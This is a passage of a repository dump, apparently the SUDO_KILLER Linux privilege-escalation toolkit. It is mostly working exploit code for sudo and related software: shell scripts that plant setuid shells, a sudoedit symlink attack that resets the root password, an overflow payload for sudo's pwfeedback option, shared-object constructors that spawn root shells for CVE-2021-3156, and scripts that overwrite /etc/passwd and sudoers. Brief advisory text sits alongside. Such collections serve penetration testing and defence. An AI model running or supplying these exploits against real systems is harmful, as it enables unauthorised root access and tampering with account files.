├── CHANGELOG.md ├── CVE ├── 3rdPartyApps │ ├── CVE-2013-4984.txt │ ├── CVE-2023-1326.txt │ ├── CVE-2023-26604.txt │ ├── CVE-2023-30630.txt │ ├── CVE-2023-32696.txt │ └── CVE-2023-32696 │ │ ├── Makefile │ │ ├── dmiwrite │ │ ├── dmiwrite.c │ │ ├── exploit-SK.sh │ │ ├── exploit.sh │ │ ├── passwd.backdoor │ │ ├── passwd.backup │ │ ├── restore.sh │ │ ├── util.c │ │ └── util.h ├── 3rdPartyDevices │ └── CVE-2023-36624.txt ├── CVE-1999-0958.txt ├── CVE-2002-0043.sh ├── CVE-2002-0184.txt ├── CVE-2005-1831.txt ├── CVE-2006-0151.perl ├── CVE-2006-0151.python ├── CVE-2010-1163.txt ├── CVE-2012-0809.txt ├── CVE-2012-0864-0809.c ├── CVE-2014-0106.txt ├── CVE-2015-5602.sh ├── CVE-2017-1000367-1.c ├── CVE-2017-1000367-2.c ├── CVE-2017-1000367.c ├── CVE-2019-14287.txt ├── CVE-2019-18634-pwfeedback │ ├── CVE-2019-18634.sh │ ├── exec.c │ ├── readme.txt │ ├── socat │ └── xpl.pl ├── CVE-2021-23240.txt ├── CVE-2021-3156 │ ├── CVE-2021-3156-notes.txt │ ├── CVE-2021-3156.txt │ ├── exploit1 │ │ ├── Makefile │ │ ├── README.md │ │ ├── brute.sh │ │ ├── hax.c │ │ └── lib.c │ ├── exploit2 │ │ └── CVE-2021-3156 │ │ │ ├── Makefile │ │ │ ├── hax.c │ │ │ └── lib.c │ └── exploit4 │ │ ├── link.txt │ │ ├── one shot │ │ ├── Makefile │ │ ├── README.md │ │ ├── exploit.c │ │ └── sice.c │ │ └── other │ │ ├── README.md │ │ ├── exploit │ │ ├── exploit.c │ │ └── one shot │ │ ├── Makefile │ │ ├── README.md │ │ ├── exploit.c │ │ └── sice.c ├── CVE-2022-3739 │ ├── 2022-3739.txt │ ├── libhax.c │ ├── rootslap.c │ └── slapd.conf ├── CVE-2022-45153 │ ├── CVE-2022-45153.txt │ └── ha_cluster_exploit.sls ├── CVE-2023-1326.sh ├── CVE-2023-22809.txt ├── cve.sudover.vuln.txt └── cve_updatev2.sh ├── FUNDING.yml ├── LICENSE ├── README.md ├── SK-Tools ├── Dangerous_env_var.txt ├── SK-ImperBruteForce-NoPwd.sh ├── SK-alias-sudoers.sh ├── SK-app-check.sh ├── SK-credHarvest2.sh ├── SK-csuid-with-sudo.sh ├── SK-recursive-impersonate-audit.sh ├── SK-recursive-impersonate.sh ├── SK-relative-path.sh ├── SK-runas.sh ├── SK-search-sudoers.sh ├── SK-su-BruteForce.sh ├── SK-ttyInject.sh ├── passwords.txt ├── ttyInject.py ├── userpwd.txt └── users.txt ├── SUDO_KILLERv3.sh ├── dbins ├── 7z.txt ├── Dangerous_env_var.txt ├── aa-exec.txt ├── ab.txt ├── absolute_path-sudoedit.txt ├── agetty.txt ├── alpine.txt ├── anansi_util.txt ├── ansible-playbook.txt ├── ansible-test.txt ├── aoss.txt ├── apache2.txt ├── apache2ctl.txt ├── apt-get.txt ├── apt.txt ├── ar.txt ├── aria2c.txt ├── arj.txt ├── arp.txt ├── as.txt ├── ascii-xfr.txt ├── ascii85.txt ├── ash.txt ├── aspell.txt ├── at.txt ├── atobm.txt ├── awk.txt ├── aws.txt ├── base32.txt ├── base58.txt ├── base64.txt ├── basenc.txt ├── basez.txt ├── bash.txt ├── batcat.txt ├── bc.txt ├── bconsole.txt ├── bins.txt ├── bpftrace.txt ├── bridge.txt ├── bundle.txt ├── bundler.txt ├── busctl.txt ├── busybox.txt ├── byebug.txt ├── bzip2.txt ├── c89.txt ├── c99.txt ├── cabal.txt ├── cancel.txt ├── capsh.txt ├── cat.txt ├── cdist.txt ├── certbot.txt ├── check_by_ssh.txt ├── check_cups.txt ├── check_log.txt ├── check_memory.txt ├── check_raid.txt ├── check_ssl_cert.txt ├── check_statusfile.txt ├── chmod.txt ├── choom.txt ├── chown.txt ├── chroot.txt ├── clamscan.txt ├── cmp.txt ├── cobc.txt ├── column.txt ├── comm.txt ├── composer.txt ├── cowsay.txt ├── cowthink.txt ├── cp.txt ├── cpan.txt ├── cpio.txt ├── cpulimit.txt ├── crash.txt ├── crontab.txt ├── csh.txt ├── csplit.txt ├── csvtool.txt ├── cupsfilter.txt ├── curl.txt ├── cut.txt ├── dash.txt ├── date.txt ├── dc.txt ├── dd.txt ├── debugfs.txt ├── dialog.txt ├── diff.txt ├── dig.txt ├── distcc.txt ├── dmesg.txt ├── dmidecode.txt ├── dmsetup.txt ├── dnf.txt ├── docker.txt ├── docker_exp.txt ├── dos2unix.txt ├── dosbox.txt ├── dotnet.txt ├── dpkg.txt ├── dstat.txt ├── dvips.txt ├── easy_install.txt ├── eb.txt ├── ed.txt ├── efax.txt ├── elvish.txt ├── emacs.txt ├── env.txt ├── eqn.txt ├── espeak.txt ├── ex.txt ├── exiftool.txt ├── expand.txt ├── expect.txt ├── facter.txt ├── file.txt ├── find.txt ├── finger.txt ├── fish.txt ├── flask.txt ├── flock.txt ├── fmt.txt ├── fold.txt ├── fping.txt ├── ftp.txt ├── gawk.txt ├── gcc.txt ├── gcloud.txt ├── gcore.txt ├── gdb.txt ├── gem.txt ├── genie.txt ├── genisoimage.txt ├── ghc.txt ├── ghci.txt ├── gimp.txt ├── ginsh.txt ├── git.txt ├── grc.txt ├── grep.txt ├── gtester.txt ├── gzip.txt ├── hd.txt ├── head.txt ├── hexdump.txt ├── highlight.txt ├── hping3.txt ├── iconv.txt ├── iftop.txt ├── install.txt ├── ionice.txt ├── ip.txt ├── irb.txt ├── ispell.txt ├── jjs.txt ├── joe.txt ├── join.txt ├── journalctl.txt ├── jq.txt ├── jrunscript.txt ├── jtag.txt ├── julia.txt ├── knife.txt ├── ksh.txt ├── ksshell.txt ├── ksu.txt ├── kubectl.txt ├── latex.txt ├── latexmk.txt ├── ld.so.txt ├── ldconfig.txt ├── less.txt ├── lftp.txt ├── ln.txt ├── loginctl.txt ├── logsave.txt ├── look.txt ├── lp.txt ├── ltrace.txt ├── lua.txt ├── lualatex.txt ├── luatex.txt ├── lwp-download.txt ├── lwp-request.txt ├── mail.txt ├── make.txt ├── man.txt ├── mawk.txt ├── minicom.txt ├── more.txt ├── mosquitto.txt ├── mount.txt ├── msfconsole.txt ├── msgattrib.txt ├── msgcat.txt ├── msgconv.txt ├── msgfilter.txt ├── msgmerge.txt ├── msguniq.txt ├── mtr.txt ├── multitime.txt ├── mv.txt ├── mysql.txt ├── nano.txt ├── nasm.txt ├── nawk.txt ├── nc.txt ├── ncdu.txt ├── ncftp.txt ├── neofetch.txt ├── nft.txt ├── nice.txt ├── nl.txt ├── nm.txt ├── nmap.txt ├── node.txt ├── nohup.txt ├── npm.txt ├── nroff.txt ├── nsenter.txt ├── octave.txt ├── od.txt ├── openssl.txt ├── openvpn.txt ├── openvt.txt ├── opkg.txt ├── pandoc.txt ├── paste.txt ├── pax.txt ├── pdb.txt ├── pdflatex.txt ├── pdftex.txt ├── perf.txt ├── perl.txt ├── perlbug.txt ├── pexec.txt ├── pg.txt ├── php.txt ├── pic.txt ├── pico.txt ├── pidstat.txt ├── pip.txt ├── pip3.txt ├── pkexec.txt ├── pkg.txt ├── posh.txt ├── pr.txt ├── pry.txt ├── psftp.txt ├── psql.txt ├── ptx.txt ├── puppet.txt ├── pwfeedback.txt ├── pwsh.txt ├── python.txt ├── python2.txt ├── python3.txt ├── rake.txt ├── rb.txt ├── rc.txt ├── readelf.txt ├── red.txt ├── redcarpet.txt ├── redis.txt ├── restic.txt ├── rev.txt ├── rlogin.txt ├── rlwrap.txt ├── rpm.txt ├── rpmdb.txt ├── rpmquery.txt ├── rpmverify.txt ├── rsync.txt ├── rtorrent.txt ├── ruby.txt ├── run-mailcap.txt ├── run-parts.txt ├── rview.txt ├── rvim.txt ├── sash.txt ├── scanmem.txt ├── scp.txt ├── screen.txt ├── script.txt ├── scrot.txt ├── sed.txt ├── service.txt ├── setarch.txt ├── setfacl.txt ├── setlock.txt ├── sftp.txt ├── sg.txt ├── shuf.txt ├── slsh.txt ├── smbclient.txt ├── snap.txt ├── socat.txt ├── socket.txt ├── soelim.txt ├── softlimit.txt ├── sort.txt ├── split.txt ├── sqlite3.txt ├── sqlmap.txt ├── ss.txt ├── ssh-agent.txt ├── ssh-keygen.txt ├── ssh-keyscan.txt ├── ssh.txt ├── sshpass.txt ├── start-stop-daemon.txt ├── stdbuf.txt ├── step1.out ├── strace.txt ├── strings.txt ├── su.txt ├── sudo.txt ├── sysctl.txt ├── syst-resolve.txt ├── systemctl.txt ├── systemd-resolve.txt ├── tac.txt ├── tail.txt ├── tar.txt ├── task.txt ├── taskset.txt ├── tasksh.txt ├── tbl.txt ├── tclsh.txt ├── tcpdump.txt ├── tdbtool.txt ├── tee.txt ├── telnet.txt ├── terraform.txt ├── tex.txt ├── tftp.txt ├── tic.txt ├── time.txt ├── timedatectl.txt ├── timeout.txt ├── tmate.txt ├── tmux.txt ├── top.txt ├── torify.txt ├── torsocks.txt ├── troff.txt ├── tshark.txt ├── ul.txt ├── unexpand.txt ├── uniq.txt ├── unshare.txt ├── unsquashfs.txt ├── unzip.txt ├── update-alternatives.txt ├── update │ ├── SK_dbins_update.sh │ ├── bins_07-02-24.txt │ ├── conca-new.txt │ ├── conca-temp.txt │ ├── newAdd │ │ └── notes.md │ └── old │ │ ├── bins_25-01-24.txt │ │ └── bins_31-07-23.txt ├── uudecode.txt ├── uuencode.txt ├── vagrant.txt ├── valgrind.txt ├── varnishncsa.txt ├── vi.txt ├── view.txt ├── viff.txt ├── vigr.txt ├── vim.txt ├── vimdiff.txt ├── vipw.txt ├── virsh.txt ├── volatility.txt ├── w3m.txt ├── wall.txt ├── watch.txt ├── wc.txt ├── wget.txt ├── whiptail.txt ├── whois.txt ├── wireshark.txt ├── wish.txt ├── xargs.txt ├── xdg-user-dir.txt ├── xdotool.txt ├── xelatex.txt ├── xetex.txt ├── xmodmap.txt ├── xmore.txt ├── xpad.txt ├── xxd.txt ├── xz.txt ├── yarn.txt ├── yash.txt ├── yelp.txt ├── yum.txt ├── zathura.txt ├── zip.txt ├── zsh.txt ├── zsoelim.txt └── zypper.txt ├── notes ├── Excessive_directory_rights.txt ├── SHELL_BUILTIN.md ├── chown-hR.txt ├── env_exploit.txt ├── execessive_priv.txt ├── file_owner_hijacking(chown).txt ├── file_owner_hijacking(rsync).txt ├── file_owner_hijacking(tar).txt ├── file_permission_hijacking.txt ├── notes.txt ├── owner_direc_missing_file.txt ├── redirect-traffic-apt.txt ├── sudo_caching.txt └── user_impersonation.txt └── res ├── Dangerous_env_var.txt ├── Env_exploit.so ├── Env_exploit2.so ├── SK-alias-sudoers.sh ├── SK-app-check.sh ├── SK-csuid-with-sudo.sh ├── SK-recursive-impersonate.sh ├── SK-relative-path.sh ├── SK-search-sudoers.sh ├── SK-su-BruteForce.sh ├── SK-sudo-list.sh ├── SK-ttyInject.sh ├── SK_dbins_update.sh ├── SK_update_txt.sh ├── credHarvest ├── credHarvest.sh ├── extract.sh ├── hudo.c ├── ld_library.c ├── passwords.txt ├── sudo_injec ├── README.md ├── activate_sudo_token ├── exploit.sh ├── exploit_v2.sh ├── exploit_v3.sh └── slides_breizh_2019.pdf ├── sys_bins.txt ├── ttyInject.py ├── userpwd.txt └── users.txt /CVE/3rdPartyApps/CVE-2023-1326.txt: -------------------------------------------------------------------------------- 1 | The apport-cli supports view a crash. These features invoke the default 2 | pager, which is likely to be less, other functions may apply. 3 | 4 | It can be used to break out from restricted environments by spawning an 5 | interactive system shell. If the binary is allowed to run as superuser 6 | by sudo, it does not drop the elevated privileges and may be used to 7 | access the file system, escalate or maintain privileged access. 8 | 9 | apport-cli should normally not be called with sudo or pkexec. In case it 10 | is called via sudo or pkexec execute `sensible-pager` as the original 11 | user to avoid privilege elevation. 12 | 13 | Proof of concept: 14 | 15 | ``` 16 | $ sudo apport-cli -c /var/crash/xxx.crash 17 | [...] 18 | Please choose (S/E/V/K/I/C): v 19 | !id 20 | uid=0(root) gid=0(root) groups=0(root) 21 | !done (press RETURN) 22 | ``` 23 | 24 | This fixes CVE-2023-1326. 25 | 26 | Bug: https://launchpad.net/bugs/2016023 27 | -------------------------------------------------------------------------------- /CVE/3rdPartyApps/CVE-2023-32696.txt: -------------------------------------------------------------------------------- 1 | Bugs 2 | The ckan user (equivalent to www-data) owned code and configuration files in the docker container. 3 | 4 | The ckan user had the permissions to use sudo 5 | 6 | Package: 7 | ckan-base (Docker) 8 | 9 | Affected versions: 10 | <2.9.9, <2.10.1 11 | 12 | Patched versions: 13 | 2.9.9, 2.10.1 14 | 15 | -------------- 16 | 17 | Package: 18 | ckan-dev (Docker) 19 | 20 | Affected versions: 21 | <2.9.9, <2.10.1 22 | 23 | Patched versions: 24 | 2.9.9, 2.10.1 25 | 26 | Impact 27 | These bugs allow for (1) code execution or (2) privilege escalation if an arbitrary file write bug is available. 28 | 29 | Patches 30 | These vulnerabilities have been fixed in the images tagged ckan-base:2.9.9, ckan-base:2.9.9-dev, ckan-base:2.10.1 and ckan-base:2.10.1-dev 31 | 32 | ---------- 33 | 34 | -------------------------------------------------------------------------------- /CVE/3rdPartyApps/CVE-2023-32696/Makefile: -------------------------------------------------------------------------------- 1 | CFLAGS = -W -Wall -Wshadow -Wstrict-prototypes -Wpointer-arith -Wcast-qual \ 2 | -Wcast-align -Wwrite-strings -Wmissing-prototypes -Winline -Wundef 3 | 4 | #CFLAGS += -DDEBUG 5 | 6 | all: dmiwrite 7 | 8 | dmiwrite: 9 | gcc $(CFLAGS) dmiwrite.c util.c -o dmiwrite 10 | 11 | clean: 12 | rm -f dmiwrite 13 | -------------------------------------------------------------------------------- /CVE/3rdPartyApps/CVE-2023-32696/dmiwrite: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/CVE/3rdPartyApps/CVE-2023-32696/dmiwrite -------------------------------------------------------------------------------- /CVE/3rdPartyApps/CVE-2023-32696/restore.sh: -------------------------------------------------------------------------------- 1 | 2 | 3 | #!/bin/bash 4 | 5 | # This script will compile and test the exploit. 6 | # On the vulnerable system, execution will look something like this: 7 | # 8 | # sudo dmidecode -d evil.dmi --dump-bin /etc/shadow 9 | # 10 | 11 | set -o nounset 12 | set -o errexit 13 | 14 | #cat /etc/passwd > $PWD/passwd.backup 15 | 16 | #who=$(whoami 2>/dev/null) 17 | #id=$(id | cut -d "(" -f 1 | sed 's/uid=//g' 2>/dev/null) 18 | 19 | #cat /etc/passwd | sed "s/$who:x:$id/$who:x:0/g" > "$PWD/passwd.backdoor" 20 | 21 | payload_file="$PWD/passwd.backup" 22 | write_file='/etc/passwd' 23 | 24 | # # the crafted DMI file to generate 25 | dmi_file='/tmp/sk-rstr.dmi' 26 | 27 | # # this option is not present on older versions of dmidecode 28 | flags="--no-sysfs" 29 | 30 | rm -f "${dmi_file}" 31 | 32 | #"${write_file}" 33 | 34 | make dmiwrite 35 | 36 | ./dmiwrite "${payload_file}" "${dmi_file}" 37 | 38 | sudo /usr/sbin/dmidecode "${flags}" -d "${dmi_file}" --dump-bin "${write_file}" 39 | 40 | -------------------------------------------------------------------------------- /CVE/3rdPartyApps/CVE-2023-32696/util.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #ifndef DEBUG 4 | #define DEBUG false 5 | #endif 6 | 7 | typedef unsigned char u8; 8 | typedef unsigned int u32; 9 | typedef unsigned short u16; 10 | 11 | int set_checksum(u8 *buf, size_t offset, size_t len); 12 | int checksum(const u8 *buf, size_t len); 13 | bool smbios_decode_check (const u8 *buf); 14 | 15 | bool set_checksums(u8 *buf); 16 | -------------------------------------------------------------------------------- /CVE/CVE-1999-0958.txt: -------------------------------------------------------------------------------- 1 | > There is a bug in sudo versions (at least) 1.5.2 and 1.5.3 on NCR's MP-RAS 2 | > that makes it trivial to bypass sudo's restrictions. I reported this to 3 | > the sudo-bugs address given in the source on 12/23/97, but never heard back, 4 | > so screw 'em. It is important to note that MP-RAS is one of the platforms 5 | > listed in the RUNSON file included with the distribution, so there are 6 | > probably many people running this; I imagine you will want to reconsider it 7 | > if you are one of them. 8 | 9 | This bug exists on all platforms. Sudo does not handle relative directories 10 | properly . ../../../usr/bin/date would also bypasses the access list. 11 | 12 | In short inclusion lists are are safe. Exclusion lists are not safe. 13 | 14 | > --jml -------------------------------------------------------------------------------- /CVE/CVE-2002-0043.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # root shell exploit for postfix + sudo 4 | # tested on debian powerpc unstable 5 | # 6 | # by Charles 'core' Stevenson 7 | 8 | # Put your password here if you're not in the sudoers file 9 | PASSWORD=wdnownz 10 | 11 | echo -e "sudo exploit by core \n" 12 | 13 | echo "Setting up postfix config directory..." 14 | /bin/cp -r /etc/postfix /tmp 15 | 16 | echo "Adding malicious debugger command..." 17 | echo "debugger_command = /bin/cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh">>/tmp/postfix/main.cf 18 | 19 | echo "Setting up environment..." 20 | export MAIL_CONFIG=/tmp/postfix 21 | export MAIL_DEBUG= 22 | 23 | sleep 2 24 | 25 | echo "Trying to exploit..." 26 | echo -e "$PASSWORD\n"|/usr/bin/sudo su - 27 | 28 | sleep 2 29 | 30 | echo "We should have a root shell let's check..." 31 | ls -l /tmp/sh 32 | 33 | echo "Cleaning up..." 34 | rm -rf /tmp/postfix 35 | 36 | echo "Attempting to run root shell..." 37 | /tmp/sh -------------------------------------------------------------------------------- /CVE/CVE-2015-5602.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # CVE-2015-5602 exploit by t0kx 3 | # https://github.com/t0kx/privesc-CVE-2015-5602 4 | 5 | export EDITOR="/tmp/edit" 6 | export FOLDER="${RANDOM}" 7 | export PASSWD=$(printf ${RANDOM} \ 8 | | md5sum \ 9 | | awk '{print $1}') 10 | 11 | prepare() { 12 | cat << EOF >> /tmp/edit 13 | #!/usr/bin/env bash 14 | pass="$(printf "%q" $(openssl passwd -1 -salt ${RANDOM} ${PASSWD}))" 15 | sed -i -e "s,^root:[^:]\+:,root:\${pass}:," \${1} 16 | EOF 17 | } 18 | 19 | main() { 20 | printf "[+] CVE-2015-5602 exploit by t0kx\n" 21 | printf "[+] Creating folder...\n" 22 | mkdir -p /home/${USER}/${FOLDER}/ 23 | printf "[+] Creating symlink\n" 24 | ln -sf /etc/shadow /home/${USER}/${FOLDER}/esc.txt 25 | printf "[+] Modify EDITOR...\n" 26 | prepare && chmod +x ${EDITOR} 27 | printf "[+] Change root password to: ${PASSWD}\n" 28 | sudoedit /home/${USER}/${FOLDER}/esc.txt 29 | printf "[+] Done\n" 30 | }; main -------------------------------------------------------------------------------- /CVE/CVE-2019-18634-pwfeedback/CVE-2019-18634.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # You will need socat to run this. 3 | # You can download a static version of socat here: https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat 4 | gcc -w exec.c -o /tmp/pipe 5 | ./socat pty,link=/tmp/pty,waitslave exec:"perl xpl.pl"& 6 | sleep 0.5 7 | export SUDO_ASKPASS=/tmp/pipe 8 | sudo -k -S id < /tmp/pty 9 | /tmp/pipe 10 | -------------------------------------------------------------------------------- /CVE/CVE-2019-18634-pwfeedback/exec.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | int main(void) 9 | { 10 | printf("Exploiting!\n"); 11 | int fd = open("/proc/self/exe", O_RDONLY); 12 | struct stat st; 13 | fstat(fd, &st); 14 | if (st.st_uid != 0) 15 | { 16 | fchown(fd, 0, st.st_gid); 17 | fchmod(fd, S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP); 18 | } 19 | else 20 | { 21 | setuid(0); 22 | execve("/bin/bash",NULL,NULL); 23 | } 24 | return 0; 25 | } 26 | -------------------------------------------------------------------------------- /CVE/CVE-2019-18634-pwfeedback/readme.txt: -------------------------------------------------------------------------------- 1 | This exploited was tested on sudo version 1.8.25. It should be noted that depending of the version and which linux-based OS it is (e.g. Ubuntu or Archlinux), the offset changes. 2 | In order to exploit other version of sudo, you will need to change the initial exploit a bit (mostly the offset). 3 | 4 | "1.8.21": 0x270 5 | "1.8.25": 0x256 6 | "1.8.30": 0x224 7 | 8 | The exploited provided in SK makes use of SOCAT and perl, an executable copy of socat is provided in this directory, else you can download it. 9 | 10 | Credits goes to: https://github.com/Plazmaz/CVE-2019-18634 11 | 12 | --------->>>>>>>ANY CONTRIBUTION TO MAKE THIS EXPLOIT WORK ON OTHER VERSIONS ARE WELCOME <<<<<-------------- 13 | 14 | -------------------------------------------------------------------------------- /CVE/CVE-2019-18634-pwfeedback/socat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/CVE/CVE-2019-18634-pwfeedback/socat -------------------------------------------------------------------------------- /CVE/CVE-2019-18634-pwfeedback/xpl.pl: -------------------------------------------------------------------------------- 1 | $buf_sz = 256; 2 | $askpass_sz = 32; 3 | $signo_sz = 4*65; 4 | $tgetpass_flag = "\x04\x00\x00\x00" . ("\x00"x24); 5 | # 0x555555577b20 6 | # Layout: 7 | # Buffer[256] 8 | # askpass [32] 9 | # Signo [260] 10 | # Flags [28] 11 | # User details 12 | print("\x00\x15"x($buf_sz+$askpass_sz) . 13 | ("\x00\x15"x$signo_sz) . 14 | ($tgetpass_flag) . "\x37\x98\x01\x00\x35\x98\x01\x00\x35\x98\x01\x00\xff\xff\xff\xff\x35\x98\x01\x00\x00\x00\x00\x00". 15 | "\x00\x00\x00\x00\x00\x15"x104 . "\n"); 16 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit1/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | rm -rf libnss_X 3 | mkdir libnss_X 4 | gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c 5 | gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c 6 | brute: all 7 | gcc -DBRUTE -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c 8 | clean: 9 | rm -rf libnss_X sudo-hax-me-a-sandwich 10 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit1/lib.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | static void __attribute__ ((constructor)) _init(void); 7 | 8 | static void _init(void) { 9 | printf("[+] bl1ng bl1ng! We got it!\n"); 10 | #ifndef BRUTE 11 | setuid(0); seteuid(0); setgid(0); setegid(0); 12 | static char *a_argv[] = { "sh", NULL }; 13 | static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL }; 14 | execv("/bin/sh", a_argv); 15 | #endif 16 | } 17 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit2/CVE-2021-3156/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | rm -rf libnss_X 3 | mkdir libnss_X 4 | gcc -o sudo-hax-me-a-sandwich hax.c 5 | gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c 6 | clean: 7 | rm -rf libnss_X sudo-hax-me-a-sandwich 8 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit2/CVE-2021-3156/lib.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | static void __attribute__ ((constructor)) _init(void); 7 | 8 | static void _init(void) { 9 | printf("[+] bl1ng bl1ng! We got it!\n"); 10 | setuid(0); seteuid(0); setgid(0); setegid(0); 11 | static char *a_argv[] = { "sh", NULL }; 12 | static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL }; 13 | execv("/bin/sh", a_argv); 14 | } 15 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit4/link.txt: -------------------------------------------------------------------------------- 1 | https://github.com/r4j0x00/exploits/tree/master/CVE-2021-3156_one_shot 2 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit4/one shot/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc exploit.c -o exploit 3 | mkdir libnss_X 4 | gcc -g -fPIC -shared sice.c -o libnss_X/X.so.2 5 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit4/one shot/README.md: -------------------------------------------------------------------------------- 1 | # Usage 2 | 3 | **Note: The libnss_X directory must be present in the present working directory while running the exploit** 4 | ## ubuntu 18.04 5 | ![usage](https://i.imgur.com/8aYRP1G.png) 6 | 7 | ## ubuntu 20.04 8 | ![usage](https://i.imgur.com/5XWVFHb.png) 9 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit4/one shot/sice.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | __attribute((constructor)) 6 | static void sice() { 7 | setuid(0); 8 | system("id"); 9 | system("bash"); 10 | exit(0); 11 | } 12 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit4/other/README.md: -------------------------------------------------------------------------------- 1 | [Demo video](https://twitter.com/r4j0x00/status/1355489323794108417) 2 | [One shot exploit](https://github.com/r4j0x00/exploits/tree/master/CVE-2021-3156_one_shot) 3 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit4/other/exploit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/CVE/CVE-2021-3156/exploit4/other/exploit -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit4/other/one shot/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc exploit.c -o exploit 3 | mkdir libnss_X 4 | gcc -g -fPIC -shared sice.c -o libnss_X/X.so.2 5 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit4/other/one shot/README.md: -------------------------------------------------------------------------------- 1 | # Usage 2 | 3 | **Note: The libnss_X directory must be present in the present working directory while running the exploit** 4 | ## ubuntu 18.04 5 | ![usage](https://i.imgur.com/8aYRP1G.png) 6 | 7 | ## ubuntu 20.04 8 | ![usage](https://i.imgur.com/5XWVFHb.png) 9 | -------------------------------------------------------------------------------- /CVE/CVE-2021-3156/exploit4/other/one shot/sice.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | __attribute((constructor)) 6 | static void sice() { 7 | setuid(0); 8 | system("id"); 9 | system("bash"); 10 | exit(0); 11 | } 12 | -------------------------------------------------------------------------------- /CVE/CVE-2022-3739/libhax.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | __attribute__ ((__constructor__)) 5 | void dropshell(void){ 6 | chown("/tmp/slapper/rootslap", 0, 0); 7 | chmod("/tmp/slapper/rootslap", 04755); 8 | printf("[+] done!\n"); 9 | } 10 | -------------------------------------------------------------------------------- /CVE/CVE-2022-3739/rootslap.c: -------------------------------------------------------------------------------- 1 | #include 2 | int main(void){ 3 | setuid(0); 4 | setgid(0); 5 | seteuid(0); 6 | setegid(0); 7 | execvp("/bin/sh", NULL, NULL); 8 | } 9 | -------------------------------------------------------------------------------- /CVE/CVE-2022-3739/slapd.conf: -------------------------------------------------------------------------------- 1 | modulepath /tmp/slapper 2 | moduleload libhax.so 3 | -------------------------------------------------------------------------------- /CVE/CVE-2022-45153/ha_cluster_exploit.sls: -------------------------------------------------------------------------------- 1 | {% set tmp_sudoers = '/tmp/sudoers' %} 2 | {% set sudoers = '/etc/sudoers' %} 3 | 4 | sudoers_backup: 5 | file.copy: 6 | - name: {{ tmp_sudoers }} 7 | - source: {{ sudoers }} 8 | - unless: cat {{ sudoers }} | grep adm 9 | 10 | sudoers_append: 11 | file.append: 12 | - name: {{ tmp_sudoers }} 13 | - text: | 14 | adm ALL=(ALL) NOPASSWD: /usr/sbin/crm_attribute -n hana__site_srHook_* 15 | - require: 16 | - sudoers_backup 17 | 18 | sudoers_check: 19 | cmd.run: 20 | - name: /usr/sbin/visudo -c -f {{ tmp_sudoers }} 21 | - require: 22 | - sudoers_append 23 | 24 | sudoers_edit: 25 | file.copy: 26 | - name: {{ sudoers }} 27 | - source: {{ tmp_sudoers }} 28 | - force: true 29 | - require: 30 | - sudoers_check 31 | -------------------------------------------------------------------------------- /CVE/CVE-2023-1326.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # root shell exploit for postfix + sudo 4 | # tested on debian powerpc unstable 5 | # 6 | # inspired by https://github.com/diego-tella/CVE-2023-1326-PoC 7 | 8 | # check that apport-client is installed, control version is lower than 2.26.0 9 | 10 | apport_version=apport-cli -v 11 | if $version < 2.26.0 12 | then 13 | echo "version ok" 14 | fi 15 | 16 | # create a crash file 17 | touch /var/crash.file 18 | 19 | # exploit 20 | sudo /usr/bin/apport-cli -c /var/crash.file 21 | # then press V (view report) 22 | echo "V" 23 | # and launch bash => !/bin/bash 24 | !/bin/bash 25 | -------------------------------------------------------------------------------- /FUNDING.yml: -------------------------------------------------------------------------------- 1 | github: TH3xACE 2 | patreon: TH3xACE 3 | -------------------------------------------------------------------------------- /SK-Tools/Dangerous_env_var.txt: -------------------------------------------------------------------------------- 1 | *=()* 2 | BASH_ENV 3 | __BASH_FUNC< 4 | BASH_FUNC_ 5 | BASHOPTS 6 | CDPATH 7 | ENV 8 | FPATH 9 | GLOBIGNORE 10 | HOSTALIASES 11 | IFS 12 | JAVA_TOOL_OPTIONS 13 | LD_* 14 | LOCALDOMAIN 15 | NLSPATH 16 | NULLCMD 17 | PATH_LOCALE 